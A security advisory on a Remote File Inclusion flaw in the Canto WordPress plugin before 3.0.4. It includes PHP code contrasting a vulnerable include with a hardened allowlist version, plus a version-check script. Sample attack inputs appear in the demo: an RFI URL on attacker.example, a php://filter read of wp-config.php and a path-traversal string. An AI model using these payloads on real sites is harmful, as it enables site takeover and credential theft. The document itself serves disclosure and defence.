A Remote File Inclusion (RFI) vulnerability has been identified in the Canto plugin for WordPress. It lets an attacker make the site's PHP interpreter fetch a file from a server the attacker controls and include it, so that attacker-supplied PHP code is executed on the web server with the privileges of the WordPress process. From there the attacker can plant backdoors or take full control of the site.

The vulnerability was discovered and reported by Marco Wotschka.

The flaw is in the canto.php file: the get_file function passes the value of the file request parameter to a PHP include without validating it. Because PHP's include accepts URLs as well as local paths, an attacker who supplies a specially crafted URL in the file parameter can have the server fetch the remote file and execute it as PHP.

Whether the remote fetch actually succeeds depends on the server's PHP configuration: include only retrieves http:// and ftp:// URLs when allow_url_include (and allow_url_fopen) is On, and allow_url_include has been Off by default since PHP 5.2. With it Off the same unvalidated include sink is still dangerous, because the parameter can be pointed at local files and at php:// stream wrappers; the bug degrades to local file inclusion, not to safety.
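The pattern behind this bug class, and the standard way to close it, as an added illustration that is not the Canto plugin's code: the names get_file and file come from the advisory, while the template directory, the allowlist entries and the sample request values are constructed assumptions for the demo. The hardened variant never lets the request choose a path string at all; it only chooses a key in a fixed allowlist, and the resolved path is additionally confined to the plugin's own directory with realpath().

```php
<?php
// Added illustration of the RFI bug class described in the advisory. NOT the
// Canto plugin's code: get_file()/`file` are the names the advisory uses, the
// template directory, allowlist and sample inputs are constructed assumptions.
// Run with: php rfi_demo.php
declare(strict_types=1);

// --- Vulnerable pattern (defined only; never called with untrusted input) ---
// A request parameter flows straight into include(). With allow_url_include=On
// PHP fetches http:// or ftp:// URLs and executes what it receives; with it Off
// the sink still reads local files and php:// wrappers (local file inclusion).
function get_file_vulnerable(string $file): void
{
    include $file;   // e.g. ?file=http://attacker.example/shell.txt
}

// --- Hardened pattern ---
// 1. Only a fixed set of logical names is accepted (allowlist): the request
//    never supplies a path, only a key.
// 2. The resolved path is canonicalised with realpath() and must stay inside
//    the plugin's own directory, which defeats ../ and symlink tricks even if
//    the allowlist itself is ever mis-edited.
// 3. Stream wrappers (http://, php://, data:, ...) cannot reach include()
//    because the caller does not control the path string.
define('TEMPLATE_DIR', sys_get_temp_dir() . '/rfi_demo_templates'); // assumed
const ALLOWED_FILES = [
    'gallery' => 'gallery.php',        // assumed template names
    'single'  => 'single-asset.php',
];

function resolve_template(string $name): string
{
    if (!array_key_exists($name, ALLOWED_FILES)) {
        throw new InvalidArgumentException("unknown template: $name");
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . ALLOWED_FILES[$name]);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("template escapes base directory: $name");
    }
    return $path;
}

function get_file_hardened(string $name): void
{
    include resolve_template($name);
}

// --- Demonstration over constructed request values ---
@mkdir(TEMPLATE_DIR, 0700);
file_put_contents(TEMPLATE_DIR . '/gallery.php',
    '<?php echo "gallery template ran\n";' . PHP_EOL);
file_put_contents(TEMPLATE_DIR . '/single-asset.php',
    '<?php echo "single-asset template ran\n";' . PHP_EOL);

$requests = [
    'gallery',                                                           // legitimate
    'http://attacker.example/shell.txt',                                 // classic RFI
    'php://filter/convert.base64-encode/resource=../../wp-config.php',   // LFI via wrapper
    '../../../wp-config.php',                                            // traversal
];
foreach ($requests as $file) {
    try {
        $path = resolve_template($file);
        printf("ACCEPT %-68s -> %s\n", var_export($file, true), $path);
        get_file_hardened($file);
    } catch (Throwable $e) {
        printf("REJECT %-68s : %s\n", var_export($file, true), $e->getMessage());
    }
}
```

Only the first request is accepted; the three attack strings are rejected before anything is resolved, because they are not allowlist keys. The realpath containment check is deliberately kept as a second line of defence rather than used alone: a "does the path start with the base directory" check without a preceding allowlist still lets a caller enumerate any file under that directory.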

Severity:

The vulnerability has a CVSS 3.1 base score of 9.8, rated Critical. A 9.8 corresponds to a flaw that is reachable over the network with low attack complexity, needs no privileges and no user interaction, and has high impact on confidentiality, integrity and availability, which is consistent with unauthenticated remote code execution on the web server.

Affected Versions:

All versions of the Canto plugin prior to 3.0.4 are affected.

Impact:

An attacker who successfully exploits this vulnerability could:

  • Create backdoors on the website
  • Take full control of the website
  • Steal sensitive data from the website
  • Disrupt the website’s operations

Recommendation:

Given the severity of this vulnerability, site owners should act immediately:

  1. Update or remove the plugin: update Canto to 3.0.4 or later, the first release not listed as affected above. If the update cannot be applied right away, deactivate and delete the plugin rather than leaving it installed but inactive: a PHP file under wp-content/plugins is reachable by the web server whether or not WordPress has activated the plugin, so deactivation alone does not remove the attack surface.
  2. Stay updated: watch the plugin's changelog and official advisories for further fixes, and keep WordPress core, themes and all plugins on current releases.
  3. Check for compromise and harden: review web server logs for requests to canto.php whose file parameter carries a URL or a php:// wrapper. If any are found, treat the site as compromised: look for unexpected PHP files under wp-content/uploads, plugins and themes, rotate database credentials and the authentication salts in wp-config.php, and reset administrator passwords. As defence in depth, keep allow_url_include=Off in php.ini, restrict write access to the document root, and keep regular security audits and access reviews in place.
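A small triage script for the affected-versions statement and step 1 above, added here and not part of the plugin or the original advisory. It reads the plugin's main-file header the way WordPress itself does (a "Version:" line within the first 8 KiB) and compares it with version_compare() against 3.0.4, the first release not listed as affected. The plugin directory path in the usage line is an assumption; the check runs against a constructed header when no path is given.

```php
<?php
// Added triage helper (not the Canto plugin's code): is the installed Canto
// version below the first fixed release named in the advisory?
// Usage: php canto_check.php /var/www/html/wp-content/plugins/canto/canto.php
//        (the plugin path is an assumption; adjust to your install)
declare(strict_types=1);

const FIXED_VERSION = '3.0.4';   // from the advisory's affected-versions section

// Read the "Version:" header as WordPress does: first 8 KiB of the main file,
// one header per line, case-insensitive, optional comment prefix characters.
function plugin_header_version(string $mainFile): ?string
{
    $head = @file_get_contents($mainFile, false, null, 0, 8192);
    if ($head === false) {
        return null;
    }
    if (preg_match('/^[ \t\/*#@]*Version:\s*(\S+)/mi', $head, $m) !== 1) {
        return null;
    }
    return $m[1];
}

// version_compare() handles dotted versions and pre-release suffixes
// (e.g. "3.0.4-beta" sorts below "3.0.4"), unlike a plain string compare.
function is_affected(string $version): bool
{
    return version_compare($version, FIXED_VERSION, '<');
}

function check_plugin(string $mainFile): string
{
    $v = plugin_header_version($mainFile);
    if ($v === null) {
        return "no Version header found in $mainFile (plugin absent or unreadable)";
    }
    return is_affected($v)
        ? "Canto $v is AFFECTED: update to " . FIXED_VERSION . " or later, or remove the plugin"
        : "Canto $v is not affected by this advisory";
}

// Constructed sample header used when no real path is passed on the command line.
$sample = sys_get_temp_dir() . '/canto_check_sample.php';
file_put_contents($sample, "<?php\n/*\nPlugin Name: Canto\nVersion: 3.0.2\n*/\n");

echo check_plugin($argv[1] ?? $sample), PHP_EOL;
```

Run it without arguments and it reports the constructed 3.0.2 header as affected; run it with the real main-file path to check a live install. The header parse is intentionally identical in spirit to WordPress's own reader, so the result matches what the plugins screen displays.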